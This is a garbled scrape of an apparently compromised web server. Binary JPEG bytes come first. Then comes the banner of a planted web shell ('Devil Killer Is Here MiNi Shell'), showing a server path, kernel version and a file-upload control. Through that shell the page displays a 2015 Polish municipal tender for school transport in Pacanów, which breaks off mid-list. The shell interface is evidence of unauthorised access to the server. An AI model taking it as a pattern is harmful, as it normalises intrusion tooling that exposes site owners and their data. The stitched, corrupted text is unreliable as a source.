JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150728/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150728/112725-N-2015.html

<p class="kh_header"><b>Pacanów: Dowóz uczniów do jednostek oświatowych prowadzonych przez Gminę Pacanów w formie zakupu biletów miesięcznych oraz uczniów niepełnosprawnych do Gimnazjum Nr 2 w Ratajach Słupskich i Niepublicznego Ośrodka Rewalidacyjno-Wychowawczego w Kupieninie według stawki dziennej, w roku szkolnym 2015/2016</b><br>
<b>Numer ogłoszenia: 112725 - 2015; data zamieszczenia: 28.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Pacanów , Rynek 15, 28-133 Pacanów, woj. świętokrzyskie, tel. 41 3765403, faks 41 3765980.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.pacanow.pl/</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dowóz uczniów do jednostek oświatowych prowadzonych przez Gminę Pacanów w formie zakupu biletów miesięcznych oraz uczniów niepełnosprawnych do Gimnazjum Nr 2 w Ratajach Słupskich i Niepublicznego Ośrodka Rewalidacyjno-Wychowawczego w Kupieninie według stawki dziennej, w roku szkolnym 2015/2016.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot  zamówienia: 
Dowóz uczniów do jednostek oświatowych prowadzonych przez Gminę Pacanów w formie zakupu biletów miesięcznych oraz uczniów niepełnosprawnych do Gimnazjum Nr 2 w Ratajach Słupskich i Niepublicznego Ośrodka Rewalidacyjno-Wychowawczego w Kupieninie według stawki dziennej w roku szkolnym 2015/2016.
Wspólny słownik zamówień publicznych CPV:
60.13.00 00-8 - Usługi w zakresie specjalistycznego transportu drogowego osób
60.10.11.11-9 - Usługi w zakresie transportu drogowego
Postanowienia ogólne:
Przedmiotem zamówienia jest: dowóz uczniów do jednostek oświatowych prowadzonych przez Gminę Pacanów,
w formie zakupu biletów miesięcznych w okresie od 1 września 2015r. do 24 czerwca 2016r oraz uczniów niepełnosprawnych do Gimnazjum Nr 2 w Ratajach Słupskich w okresie od 1 września 2015r. do 24 czerwca 2016r. i Niepublicznego Ośrodka Rewalidacyjno-Wychowawczego w Kupieninie w okresie od 1 września 2015r. do
31 lipca 2016r. według stawki dziennej w roku szkolnym 2015/2016 zgodnie z załączonymi przebiegami tras.
Dowóz odbywać się będzie dwukrotnie w ciągu dnia, w tym:
a)	 dowóz uczniów z miejsca zamieszkania do szkoły na zajęcia lekcyjne,
b)	 odwóz uczniów do miejsca zamieszkania po zajęciach lekcyjnych,
pięć dni w tygodniu, z wyłączeniem dni ustawowo wolnych od pracy, przerw świątecznych, ferii zimowych
i ferii letnich.
W przypadku awarii autobusu prowadzącego dowóz Wykonawca ma obowiązek natychmiastowego (maksymalnie do 40 minut) podstawienia sprawnego autobusu zastępczego. Wykonawca musi dysponować dodatkowymi autobusami w rejonie dowozu, które w każdej chwili może wykorzystać, jako zastępcze. Nie dopuszcza się sytuacji, w której uczniowie na jednej trasie, z powodu awarii autobusu, będą oczekiwać na autobus z innej trasy, tak długo, aż wykona on dowóz na swojej trasie i dopiero przyjedzie po oczekujących.

Do wyceny zamówienia należy przyjąć:
a)	w Części I - 186 dni roboczych, 
b)	w Części II - 211 dni roboczych 
w trakcie których realizowany będzie dowóz.
Część I: Trasa dowozu uczniów do jednostek oświatowych prowadzonych przez Gminę Pacanów - 317,8 km,
337 uczniów, określona w załączniku nr 8 do SIWZ
Część II: Trasa dowozu dzieci niepełnosprawnych do Gimnazjum Nr 2 w Ratajach Słupskich
i Niepublicznego Ośrodka Rewalidacyjno-Wychowawczego w Kupieninie - 70 km, 8 uczniów, określona
w załączniku nr  9 do SIWZ:
1)	dowóz do Gimnazjum Nr 2 w Ratajach Słupskich - 1 uczeń niepełnosprawny ruchowo poruszający się na wózku inwalidzkim, 1 uczeń z niepełnosprawnością sprzężoną niepełnosprawny ruchowo poruszający się
o kulach,
2)	dowóz do Niepublicznego Ośrodka Rewalidacyjno-Wychowawczego w Kupieninie - 1 uczeń niepełnosprawny w stopniu głębokim poruszający się na wózku inwalidzkim, 1 uczeń
z niepełnosprawnością sprzężoną w stopniu głębokim, niewidomy poruszający się na wózku inwalidzkim, 1 uczeń z całościowymi zaburzeniami rozwojowymi - autyzm dziecięcy, 1 uczeń niepełnosprawny intelektualnie w stopniu znacznym, porusza się samodzielnie, 1 uczeń niepełnosprawny, niedowidzący i nie posługujący się mową poruszający się na wózku inwalidzkim, 1 uczeń niepełnosprawny w stopniu umiarkowanym poruszający się samodzielnie.
Dla Części I Wykonawca winien zapewnić co najmniej 4 autobusy. 
W Części II dowóz winien odbywać się samochodem przystosowanym do przewozu osób niepełnosprawnych
i Wykonawca obowiązany jest zapewnić osobę do opieki nad uczniami w trakcie przewozu.

W uzasadnionych przypadkach Zamawiający zastrzega sobie prawo do ograniczenia zakresu przedmiotu zamówienia do wielkości maksymalnie 20% poszczególnych części zadania..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających stanowiących nie więcej niż 50% wartości zamówienia podstawowego. Ewentualne zamówienia zostaną udzielone w trybie przewidzianym  w art.67 ust. 1 pkt 6 ustawy Prawo Zamówień Publicznych, jeżeli spełnione zostaną przesłanki ustawowe.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8, 60.10.11.11-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający wymaga złożenia  wadium w wysokości 2500,00 zł. (słownie złotych: dwa tysiące pięćset).
W przypadku składania oferty częściowej wadium wynosi dla:
a)	Część I -  2000,00 zł (słownie złotych: dwa tysiące),
b)	Część II - 500,00 zł (słownie złotych: pięćset ).
Wadium może być wniesione zgodnie z art. 45 ust.6 ustawy PZP tj; w pieniądzu, poręczeniach bankowych lub poręczeniach  spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007r. Nr 42, poz.275). Wykonawca który nie wniósł wadium, zostaje wykluczony z postępowania, a jego ofertę uznaje się za odrzuconą.
Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego:   
Nadwiślański Bank Spółdzielczy Solec-Zdrój O Pacanów  58 85170007 0040 0400 0172 0020
z dopiskiem: Wadium w postępowaniu na wykonanie zadania pn.: Dowóz uczniów do jednostek oświatowych organizowany przez Gminę Pacanów, w roku szkolnym 2015/2016 Część...
2.	Kserokopie dowodu wpłaty (polecenie przelewu) należy dołączyć do oferty.
3.	Wadia w formach niepieniężnych należy dołączyć w oryginale do oferty.
4.	W przypadku wadium wniesionego w formie gwarancji, z treści tej gwarancji winno wynikać bezwarunkowo, że na każde pisemne żądanie zgłoszone przez Zamawiającego, w terminie związania ofertą, gwarant zobowiązuje się do wypłaty Zamawiającemu  pełnej kwoty wadium w okolicznościach określonych art. 46 ust. 5 ustawy PZP. Wadium musi być zabezpieczone na okres 30 dni, licząc od daty składania ofert - termin związania ofertą. 
5.	Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert, najpóźniej do dnia 05.08.2015r. do godz. 11.00.
6.	Zamawiający (zgodnie z art. 46 ust.1 ustawy PZP) zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a Ustawy PZP.
7.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy z sprawie zamówienia publicznego oraz wniesienia zabezpieczenia należytego wykonania umowy (jeżeli takiego zabezpieczenia żądano).
8.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
c)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy,
9.	Zamawiający zatrzyma również wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust.1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie.
10.	Pozostałe przypadki zwrotu lub zatrzymania wadium zawarto w art. 46 ustawy PZP.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek posiadania uprawnienień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa  nakładają obowiązek ich posiadania,  
W zakresie w/w warunku Zamawiający nie precyzuje szczegółowych wymagań.
Ocena spełniania warunku będzie dokonana na podstawie złożonego oświadczenia o spełnieniu warunku posiadania uprawnień do wykonywania określonej działalności lub czynności jeżeli przepisy prawa nakładają obowiązek ich posiadania  zgodnie z wzorem  (załącznik nr 2) o którym mowa w pkt. IX.2, lit. a) SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie posiadania niezbędnej wiedzy i doświadczenia.  W zakresiw w/w warunku Zamawiający nie precyzuje szczegółowych wymagań.
Ocena spełniania warunku będzie dokonana na podstawie złożonego oświadczenia o spełnieniu warunku posiadania niezbędnej wiedzy i doświadczenia  zgodnie z wzorem (załącznik nr 2) o którym mowa w pkt. IX.2, lit. a) SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,
W zakresie w/w warunku  Wykonawca złoży oświadczenie że dysponuje potencjałem  technicznym i osobami potrzebnymi do wykonania zamówienia. Zamawiający wymaga aby Wykonawca dysponował co najmniej w:
-	Części I: Trasa dowozu uczniów do szkół na terenie Gminy Pacanów - czterema autobusami i czterema kierowcami,
-	Części II: Trasa dowozu dzieci niepełnosprawnych do Gimnazjum Nr 2 w Ratajach Słupskich
i Niepublicznego Ośrodka Rewalidacyjno-Wychowawczego w Kupieninie - jednym autobusem przystosowanym do przewozu osób niepełnosprawnych, jednym kierowcą i osobą do opieki nad uczniami w trakcie przewozu.
Ocena spełniania warunku będzie dokonana na podstawie złożonego oświadczenia o dysponowaniu odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia zgodnie z wzorem (załącznik nr 2),  o którym mowa w pkt. IX.2, lit. a) SIWZ, a warunków szczegółowych na podstawie złożonego:
-	wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, zgodnie ze wzorem (załącznik nr 4), o którym mowa w pkt. IX.2. lit. b ) SIWZ,
-	 oświadczenia, że osoby które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, zgodnie z wzorem 
(załącznik nr 5), o którym mowa w pkt. IX.2. lit c) SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,
W zakresie w/w warunku  Wykonawca złoży oświadczenie że dysponuje potencjałem  technicznym i osobami potrzebnymi do wykonania zamówienia. Zamawiający wymaga aby Wykonawca dysponował co najmniej w:
-	Części I: Trasa dowozu uczniów do szkół na terenie Gminy Pacanów - czterema autobusami i czterema kierowcami,
-	Części II: Trasa dowozu dzieci niepełnosprawnych do Gimnazjum Nr 2 w Ratajach Słupskich
i Niepublicznego Ośrodka Rewalidacyjno-Wychowawczego w Kupieninie - jednym autobusem przystosowanym do przewozu osób niepełnosprawnych, jednym kierowcą i osobą do opieki nad uczniami w trakcie przewozu.
Ocena spełniania warunku będzie dokonana na podstawie złożonego oświadczenia o dysponowaniu odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia zgodnie z wzorem (załącznik nr 2),  o którym mowa w pkt. IX.2, lit. a) SIWZ, a warunków szczegółowych na podstawie złożonego:
-	wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, zgodnie ze wzorem (załącznik nr 4), o którym mowa w pkt. IX.2. lit. b ) SIWZ,
-	 oświadczenia, że osoby które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, zgodnie z wzorem 
(załącznik nr 5), o którym mowa w pkt. IX.2. lit c) SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
W zakresie w/w warunku  Zamawiający nie precyzuje szczegółowych wymagań odnośnie w/w warunku.
Ocena spełniania warunku będzie dokonana na podstawie złożonego oświadczenia że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia  zgodnie z wzorem (załącznik nr 2) o którym mowa w pkt. IX.2, lit. a) SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	pisemne zobowiązanie innych  podmiotów do oddania do dyspozycji niezbędnych zasobów na okres  korzystania z nich przy wykonywaniu zamówienia (poprzez załączenie do oferty oświadczenia wg wzoru -   załącznik nr 4a do SIWZ) - w przypadku powoływania się Wykonawcy na potencjał innych podmiotów,
b)	wykaz części zamówienia, których realizację wykonawca zamierza powierzyć podwykonawcom (wg wzoru podanego w załączniku nr 6 do SIWZ),
c)	dowód wniesienia wadium,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - czas podstawienia autobusu w przypadku awarii - 2</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje następujące okoliczności i warunki zmiany postanowień zawartej umowy: 
1)	Zmiany ceny jednostkowego biletu miesięcznego szkolnego brutto w przypadku:
a.	ustawowej zmiany stawki podatku VAT,
b.	zwiększenia bądź zmniejszenia liczby przewożonych  uczniów na danej trasie,
c.	zmiany długości  lub przebiegu tras - jeżeli z wnioskiem takim wystąpi Zamawiający lub zmiana taka stanie się konieczna ze względu na okoliczności, których nie można było przewidzieć w chwili składania oferty,
d.	zmiany liczby dni świadczenia usługi,
2)	Zmiany stawki dziennej brutto za dowóz uczniów niepełnosprawnych w przypadku:
a.	ustawowej zmiany stawki podatku VAT,
b.	zwiększenia bądź zmniejszenia liczby przewożonych uczniów.
3)	Zmiany osób odpowiedzialnych za wykonywanie zadania ze strony Wykonawcy  - jeżeli zmiana taka nie wpłynie na pozostałe warunki  realizacji umowy,
4)	Zmiana godzin, w których będzie wykonywany dowóz i odwóz - jeżeli z wnioskiem takim wystąpi Zamawiający lub zmiana taka stanie się konieczna ze względu na okoliczności, których nie można było przewidzieć w chwili składania oferty,
5)	Zamawiający dopuszcza także możliwość zmian umowy w następujących przypadkach:
a.	wystąpienie zdarzeń losowych,
b.	zmiany okresu świadczenia usługi wynikające z organizacji roku szkolnego.
6)	Zamawiający dopuszcza także możliwość zmian postanowień umowy w następujących przypadkach:
a.	gdy wprowadzenie zmian jest  korzystne dla Zamawiającego,
b.	wystąpienie nieistotnych zmian, które nie mają wpływu na istotne postanowienia umowy (termin, zakres, wartość zamówienia)</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.pacanow.pl/przetargi.php<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Pacanów, ul. Rynek 15, 28-133 Pacanów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.08.2015 godzina 11:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego: w Urzędzie Gminy Pacanów, ul. Rynek 15, pok. nr 101 (sekretariat, I piętro) w terminie do dnia 05.08.2015r do godz. 11.00.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Trasa dowozu uczniów do jednostek oświatowych prowadzonych przez Gminę Pacanów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> DOWÓZ I: 44,8 km, 132 uczniów

Kurs Nr I - 28,8 km godz. 06:45 - 07:30, (75 uczniów)  
Początek trasy: SP i Gim. Pacanów - droga krajowa Kraków-Sandomierz - Wola Biechowska (2) - Zołcza Ugory (4) - Piestrzec (8)- Biechów (17) - Wójcza przedszkole i szkoła (30 dzieci wysiada) - Biechów (24) - Wola Biechowska (20) - Słupia - droga krajowa Kraków-Sandomierz - SP i Gim. Pacanów - koniec trasy Przedszkole Pacanów

Kurs Nr II - 16 km godz. 07:35 - 08:10, (57 uczniów)  
Początek Trasy: Przedszkole Pacanów - Chrzanów (10) - Wójcza Plebanka(6) - Wójeczka (16) - Wójcza szkoła, Przedszkole (28 dzieci wysiada) - Wójcza (9) - Chrzanów (15) - Niegosławice (1) - Przedszkole Pacanów - koniec trasy SP i Gim. Pacanów

DOWÓZ II: 21,2 km, 76 uczniów

Kurs nr I - 8,6 km godz. 07:20 - 07:45 (39 uczniów)
